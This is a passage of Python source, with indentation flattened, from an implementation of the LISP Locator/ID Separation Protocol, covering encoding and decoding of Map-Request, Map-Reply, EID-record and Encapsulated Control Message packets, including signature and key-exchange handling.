lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string.encode()
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if the Map-Request is going to be signed. If so, encode the
# JSON string in the source-EID field. Otherwise, just encode the
# source-EID (with its instance-ID when non-zero) in the source-EID
# field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys have already been negotiated for the
# RLOC. If so, use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
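#
# lcaf_decode_json() parses a JSON Type LCAF found either in the
# source-EID field (signed Map-Requests) or in an ITR-RLOC (telemetry).
# It validates the LCAF and JSON lengths, stores telemetry JSON
# verbatim, and otherwise extracts the source-eid, signature-eid, and
# signature values from the JSON dictionary.
#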
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 4): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If the JSON carries telemetry data, it does not need to be converted
# to a dictionary.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get the AFI that follows the JSON string; we are expecting an AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert the JSON string to a dictionary.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if ("source-eid" not in json_string): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if ("signature-eid" not in json_string): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if ("signature" not in json_string): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
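#
# decode() parses a received Map-Request in this order: the 4-byte
# header, the 8-byte nonce, the xTR-ID (when the xtr_id_present bit is
# set, taken from the end of the packet), the source-EID (plain AFI,
# LCAF instance-ID, or signed JSON), the ITR-RLOC list (which may carry
# Security or JSON/telemetry LCAFs), and finally the target EID-record.
#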
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == None): return(None)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (addr_str in rloc_keys): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, the lisp-etr process needs
# to tell the data-plane that there is no longer a decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (addr_str in lisp_crypto_keys_by_rloc_decap):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
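#
# The 128-bit xTR-ID rides at the very end of a subscription
# Map-Request. It is split into two 64-bit halves that are byte-swapped
# into network order on encode; decode_xtr_id() pulls the last 16 bytes
# of the packet and reassembles the value.
#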
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply(object):
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
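#
# encode() builds only the fixed 12-byte Map-Reply header (flags,
# hop-count, record-count, and nonce); the caller appends the
# EID-records and RLOC-records after it.
#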
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
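#
# If we initiated a Diffie-Hellman exchange in the Map-Request, the
# keys were cached by nonce. Claim them here and remove the by-nonce
# entry so it is not reused.
#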
if (self.nonce in lisp_crypto_keys_by_nonce):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator records is encrypted with the
# chacha cipher.
#
# And this is the format of an EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record(object):
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
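#
# The record TTL is stored in minutes. If the high-order bit is set,
# the low 31 bits are interpreted as seconds instead. print_ttl()
# displays a minute value evenly divisible by 60 as hours, and
# store_ttl() always returns the TTL converted to seconds.
#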
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding a geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm(object):
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
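#
# Note on the length fields below: for IPv4 the inner IP total-length
# includes the 20-byte IP header plus the UDP length, while for IPv6
# the payload-length field carries only the UDP length (the 40-byte
# IPv6 header is excluded).
#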
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
